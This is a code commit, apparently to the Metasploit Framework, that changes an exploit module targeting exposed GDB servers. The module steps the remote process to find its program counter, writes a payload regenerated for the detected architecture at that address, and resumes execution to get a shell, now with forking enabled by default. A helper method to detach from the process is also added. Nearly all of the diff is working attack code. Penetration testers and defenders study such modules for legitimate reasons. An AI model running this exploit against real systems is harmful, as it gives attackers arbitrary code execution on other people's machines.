Add PrependFork to payload options.

Author: jvennix-r7

lib/msf/core/exploit/gdb.rb

@@ -119,6 +119,14 @@ def continue(opts={})
     read_response if opts.fetch(:read, true)
   end
 
+  # Detaches from the remote process
+  # @param opts [Hash] the options hash
+  # @option opts :read [Boolean] read the response
+  def detach(opts={})
+    send_cmd 'D'
+    read_response if opts.fetch(:read, true)
+  end
+
   # Executes one instruction on the remote process
   #
   # The results of running "step" will look like:

modules/exploits/multi/gdb/gdb_server_exec.rb

@@ -21,8 +21,11 @@ def initialize(info = {})
         [ 'x86 (32-bit)',    { 'Arch' => ARCH_X86 } ],
         [ 'x86_64 (64-bit)', { 'Arch' => ARCH_X86_64 } ]
       ],
-      'Platform'      => %w(linux unix osx windows),
-      'DefaultTarget' => 0
+      'Platform'      => %w(linux unix osx),
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'PrependFork' => true
+      }
     ))
   end
 
@@ -35,23 +38,14 @@ def exploit
     print_status "Stepping program to find PC..."
     gdb_pc, gdb_arch = process_info.values_at :pc, :arch
 
-    unless payload.arch.include? gdb_arch
-      fail_with(
-        Msf::Exploit::Failure::BadConfig,
-        "The payload architecture is incorrect: "+
-        "the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb."
-      )
-    end
+    p = regenerate_payload(nil, gdb_arch, nil)
 
     print_status "Writing payload at #{gdb_pc}..."
-    write(payload.encoded, gdb_pc)
+    write(p.encoded, gdb_pc)
 
     print_status "Executing the payload..."
     continue
 
-    # gdb throws a SIGINT on the execve, so a second continue is necessary
-    continue(read: false) # don't wait on response, as the shell is now looping
-
     handler
     disconnect
   end